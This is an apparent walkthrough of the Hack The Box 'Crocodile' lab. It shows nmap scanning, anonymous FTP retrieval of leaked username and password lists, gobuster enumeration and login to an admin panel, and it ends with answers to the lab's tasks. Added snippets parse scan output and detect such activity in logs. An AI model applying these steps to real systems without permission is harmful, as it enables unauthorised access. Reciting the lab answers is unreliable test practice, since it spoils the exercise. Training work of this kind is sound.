#8 Crocodile - Starting Point - Hack The Box || Complete Detailed Walkthrough

Crocodile is another starting point vulnerable machine that contains a misconfigured service that leaks information that might allow you to impersonate the digital identity of a victim.


Tackling an example sewn together from two previous targets, we will be looking at an insecure access configuration on FTP and an administrative login for a website. Let us proceed to deconstruct this vector and analyze its components.


Enumeration

We will start by enumerating the target. Our first step is, as always, a thorough nmap scan. The following two switches ensure that nmap probes the service running on every port found in the open state and returns a reasonably exact service version in the output, and that all of the default analysis scripts are run against the target, since we are not constrained in how intrusive our scan can be. Running the scan as described produces the results seen below, including directory and file names the scan has already found for us!

  • -sC: performs a script scan using the default set of scripts. It is equivalent to --script=default . Some of the scripts in this category are considered intrusive and should not be run against a target network without permission.
  • -sV: Enables version detection, which will detect what versions are running on what port.

┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -sV 10.129.57.249
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-24 15:42 IST
Nmap scan report for 10.129.57.249
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (conn-refused)

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.21
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Smash - Bootstrap Business Template
|_http-server-header: Apache/2.4.41 (Ubuntu)

Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 62.29 seconds
┌──(mrdev㉿mrdev)-[~] 
└─$ 

We have two open ports, which are 21 and 80.

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

Port 21 is the port dedicated to FTP (File Transfer Protocol), meaning that its primary use is to transfer files between hosts over a network.
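As an added example (not part of the original walkthrough), the following Python parses nmap's normal output for exactly the findings used in this section: open ports with their service versions and, for FTP, whether the ftp-anon script reported anonymous login and which files it listed. The scan text is a constructed, trimmed excerpt laid out like the scan above; the function names parse_scan and anonymous_ftp_findings are my own.

```python
import re

# Constructed excerpt of an "nmap -sC -sV" report (normal output format), laid
# out like the scan in this walkthrough and trimmed to the lines that matter.
SAMPLE_SCAN = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Smash - Bootstrap Business Template
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
ANON_RE = re.compile(r"^\|_?\s*ftp-anon: Anonymous FTP login allowed \(FTP code (\d+)\)")
# "| -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 name": perms, links, owner, group, size, date x3, name
FILE_RE = re.compile(r"^\|_?\s*([-dl][rwx-]{9})\s+\d+\s+\S+\s+\S+\s+(\d+)(?:\s+\S+){3}\s+(\S+)$")


def parse_scan(text):
    """Map each open port to its service line; FTP ports also get ftp-anon details."""
    findings, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current = findings[int(port)] = {"proto": proto, "state": state,
                                             "service": service, "version": version,
                                             "anonymous": False, "files": []}
            continue
        if current is None or not line.startswith("|"):
            continue  # script output always belongs to the last port seen
        m = ANON_RE.match(line)
        if m:
            current["anonymous"], current["ftp_code"] = True, int(m.group(1))
            continue
        m = FILE_RE.match(line)
        if m and current["anonymous"]:
            perms, size, name = m.groups()
            # the "other" read bit is the 8th permission character (index 7)
            current["files"].append({"name": name, "size": int(size),
                                     "world_readable": perms[7] == "r"})
    return findings

def anonymous_ftp_findings(findings):
    """Ports where anonymous login worked and the listing exposed at least one file."""
    return {p: f for p, f in findings.items() if f["anonymous"] and f["files"]}
```

On vsftpd, a hit from anonymous_ftp_findings maps to the anonymous_enable directive in vsftpd.conf, which should be NO unless anonymous read access is intended.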



Using the FTP Client tool

Users could connect to the FTP server anonymously if the server is configured to allow it, meaning that we could use it even if we had no valid credentials. If we look back at our Nmap scan result, the FTP server is indeed configured to allow anonymous login.

21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.21
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd

To connect to the remote FTP server, you need to specify the target's IP address (or hostname), as displayed on the Starting Point lab page. The prompt will then ask us for our login credentials, which is where we can fill in the anonymous username. In our case, the FTP server does not request a password, and entering the anonymous username is enough for us to receive the 230 code and log in successfully.

┌──(mrdev㉿mrdev)-[~]
└─$ ftp 10.129.57.249
Connected to 10.129.57.249.
220 (vsFTPd 3.0.3)
Name (10.129.57.249:mrdev): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

We will use ls and get to list the directory contents and retrieve the files stored on the FTP server. With the ls command, we can check the contents of our current directory on the remote host, where two interesting files catch our attention. They seem to be files left over from the configuration of another service on the host, most likely the HTTPd web server. Their names are descriptive, hinting towards a possible username list and associated passwords.

ftp> ls
229 Entering Extended Passive Mode (|||44157|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
226 Directory send OK.
ftp>

Both files can easily be downloaded using the get command. The FTP client reports the transfer progress and completion back to you during this phase. It should not take long to have them both sitting snugly on your attacking VM.

ftp> get allowed.userlist
local: allowed.userlist remote: allowed.userlist
229 Entering Extended Passive Mode (|||43675|) 
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
100% |****************************************|    33      138.31 KiB/s    00:00 ETA 226 Transfer complete.
33 bytes received in 00:00 (0.09 KiB/s)
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
229 Entering Extended Passive Mode (|||44853|)
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
100% |****************************************|    62       72.07 KiB/s    00:00 ETA 226 Transfer complete.
62 bytes received in 00:00 (0.26 KiB/s)  
ftp>

Termination of the FTP connection can be done by using the bye command. This will return the current terminal tab to its previous state.

ftp> bye
221 Goodbye.
┌──(mrdev㉿mrdev)-[~] 
└─$

Immediately after exiting the FTP service shell, we can type in the ls command to check if our files are present in the directory we were last positioned in. In order to read their contents and discover usernames and passwords within, we can use the cat command, followed by the name of the file we want to open.

┌──(mrdev㉿mrdev)-[~] 
└─$ ls  
allowed.userlist         Desktop    Documents  Music     Public     Videos
allowed.userlist.passwd   dirbuster  Downloads  Pictures  Templates  wordlist

┌──(mrdev㉿mrdev)-[~]
└─$ cat allowed.userlist 
aron
pwnmeow
egotisticalsw
admin

┌──(mrdev㉿mrdev)-[~]
└─$ cat allowed.userlist.passwd
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd 

Foothold

After the credentials have been obtained, the next step is to check whether they grant elevated access on the FTP service, or work on the web server on port 80 discovered during the Nmap scan. Attempting to log in with any of the credentials on the FTP server returns the error 530 This FTP server is anonymous only. No luck here, so we can exit the FTP service shell.

┌──(mrdev㉿mrdev)-[~]
└─$ ftp 10.129.57.249
Connected to 10.129.57.249.
220 (vsFTPd 3.0.3)
Name (10.129.57.249:mrdev): aron
530 This FTP server is anonymous only.
ftp: Login failed
ftp>

However, we have one option left. During the Nmap scan, the service running on port 80 was reported as Apache httpd 2.4.41, an Apache HTTP server. Typing the target's IP address into the browser's address bar brings up the webpage. It seems to be a storefront for a server hosting company.

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Smash - Bootstrap Business Template
|_http-server-header: Apache/2.4.41 (Ubuntu)

Reading about the target is helpful, but only at a surface level. In order to gain more insight into the technology they have used to create their website and possibly find any associated vulnerabilities, we can use a handy browser plug-in called Wappalyzer. 


Using Wappalyzer

This plug-in analyzes the web page's code and returns all the different technologies used to build it, such as the webserver type, JavaScript libraries, programming languages, and more. 


Once installed, you can access Wappalyzer by clicking its icon at the top right of the browser window. Below are the results for our current target.

From the output of Wappalyzer, we can note some of the more interesting items, specifically that the web page is built with PHP. However, nothing gives us a direct plan of attack for now, and navigating around the page using its tabs and buttons leads us nowhere. As mentioned in previous write-ups, there is a more direct way of finding hidden or hard-to-reach directories and pages: directory busting, which requests names from a wordlist and keeps those the server answers for.


Using Gobuster

Using gobuster as our tool of choice, we can use the following switches to get the fastest, most accurate results.

  • dir : Uses directory/file enumeration mode.
  • -u  : The target URL.
  • -w : Path to the wordlist.
  • -x  : File extension(s) to search for.

For the -x switch, we can specify php and html so that gobuster also requests each wordlist entry with those extensions, keeping the results focused on pages rather than unrelated clutter.

PHP and HTML files will most commonly be pages. We might get lucky and find an administrative panel login page that could help us find leverage against the target in combination with the credentials we extracted from the FTP server.

┌──(mrdev㉿mrdev)-[~]  
└─$ sudo gobuster dir -u 10.129.57.249 -w dirbuster/directory-list-2.3-small.txt -x php,html
[sudo] password for mrdev:  
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) 
===============================================================
[+] Url:                     http://10.129.57.249
[+] Method:                  GET 
[+] Threads:                 10
[+] Wordlist:                dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php 
[+] Timeout:                 10s
===============================================================
2021/12/24 16:44:16 Starting gobuster in directory enumeration mode
=============================================================== 
/index.html           (Status: 200) [Size: 58565]
/login.php            (Status: 200) [Size: 1577]
/assets               (Status: 301) [Size: 315] [--> http://10.129.57.249/assets/]
/css                  (Status: 301) [Size: 312] [--> http://10.129.57.249/css/] 
/js                   (Status: 301) [Size: 311] [--> http://10.129.57.249/js/]
/logout.php           (Status: 302) [Size: 0] [--> login.php] 
/config.php           (Status: 200) [Size: 0]
/fonts                (Status: 301) [Size: 314] [--> http://10.129.57.249/fonts/]
/dashboard            (Status: 301) [Size: 318] [--> http://10.129.57.249/dashboard/]
Progress: 41064 / 262995 (15.61%)                                                   ^C

[!] Keyboard interrupt detected, terminating. 
===============================================================
2021/12/24 17:05:00 Finished
===============================================================  
┌──(mrdev㉿mrdev)-[~]
└─$ 

One of the most interesting files gobuster retrieved is the /login.php page. Navigating manually to the URL, in the form of http://10.129.57.249/login.php, we are met with a login page asking for a username/password combination.


If the lists of credentials we found had been longer, we could have used a Metasploit module or a login brute-force script to run through combinations from both lists faster than manual labor. In this case, however, the lists are relatively small, allowing us to attempt logging in manually.

aron:root
pwnmeow:Supersecretpassword1
egotisticalsw:@BaASD&9032123sADS
admin:rKXM59ESxesUFHAd

After attempting several username/password combinations, we managed to log in and are met with a Server Manager admin panel. Once here, an attacker could manipulate the website in whichever way they desired, causing havoc for the userbase and owners, or extracting more information that would assist them with gaining a foothold on the servers hosting the web page.
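As an added defender-side example (not part of the original walkthrough), the following Python reads Apache access logs and flags the two activities this page performs against the web server: the gobuster directory enumeration (a burst of 404s and a scanner User-Agent) and repeated login attempts against /login.php with the leaked credential pairs. The log lines are constructed, and the assumption that a successful login answers with a 302 redirect is mine, not taken from the page.

```python
import re
from collections import defaultdict

# Constructed Apache "combined" access-log lines (assumption: the target's Apache
# uses that LogFormat). The 404 burst and User-Agent mirror the gobuster run above;
# the POSTs mirror trying the leaked credential pairs against /login.php.
SAMPLE_LOG = """\
10.10.14.21 - - [24/Dec/2021:16:44:16 +0000] "GET /index.html HTTP/1.1" 200 58565 "-" "gobuster/3.1.0"
10.10.14.21 - - [24/Dec/2021:16:44:16 +0000] "GET /images HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.10.14.21 - - [24/Dec/2021:16:44:16 +0000] "GET /images.php HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.10.14.21 - - [24/Dec/2021:16:44:17 +0000] "GET /login.php HTTP/1.1" 200 1577 "-" "gobuster/3.1.0"
10.10.14.21 - - [24/Dec/2021:17:10:02 +0000] "POST /login.php HTTP/1.1" 200 1600 "-" "Mozilla/5.0"
10.10.14.21 - - [24/Dec/2021:17:10:09 +0000] "POST /login.php HTTP/1.1" 200 1600 "-" "Mozilla/5.0"
10.10.14.21 - - [24/Dec/2021:17:10:15 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.7 - - [24/Dec/2021:17:11:00 +0000] "GET /index.html HTTP/1.1" 200 58565 "-" "Mozilla/5.0"
"""

# ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')


def parse_log(text):
    """Yield (ip, method, path, status, user_agent) for each well-formed line."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ip, method, path, status, agent = m.groups()
            yield ip, method, path, int(status), agent


def suspicious_sources(text, not_found_limit=2, login_post_limit=2):
    """Return per-IP counters for sources that look like enumeration or password guessing.
    Assumption (not from the page): login.php answers a successful login with a 302."""
    stats = defaultdict(lambda: {"not_found": 0, "login_posts": 0,
                                 "login_redirect": False, "scanner_agent": False})
    for ip, method, path, status, agent in parse_log(text):
        s = stats[ip]
        if status == 404:
            s["not_found"] += 1
        if agent.lower().startswith(("gobuster", "dirbuster", "dirb")):
            s["scanner_agent"] = True  # cheap signal; the agent string is easily changed
        if method == "POST" and path == "/login.php":
            s["login_posts"] += 1
            if status == 302:
                s["login_redirect"] = True  # guessing followed by success is the urgent case
    return {ip: s for ip, s in stats.items()
            if s["scanner_agent"] or s["not_found"] >= not_found_limit
            or s["login_posts"] >= login_post_limit}
```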


We successfully got the flag! It is displayed for us at the top of the admin panel. 

Task Answers


TASK 1: What nmap scanning switch employs the use of default scripts during a scan?

Ans. -sC

TASK 2: What service version is found to be running on port 21?

Ans. vsftpd 3.0.3

TASK 3: What FTP code is returned to us for the "Anonymous FTP login allowed" message?

Ans. 230

TASK 4: What command can we use to download the files we find on the FTP server?

Ans. get

TASK 5: What is one of the higher-privilege-sounding usernames in the list we retrieved?

Ans. admin

TASK 6: What version of Apache HTTP Server is running on the target host?

Ans. 2.4.41

TASK 7: What is the name of a handy website analysis plug-in we can install in our browser?

Ans. Wappalyzer

TASK 8: What switch can we use with gobuster to specify we are looking for specific file types?

Ans. -x

TASK 9: What file have we found that can provide us a foothold on the target?

Ans. login.php


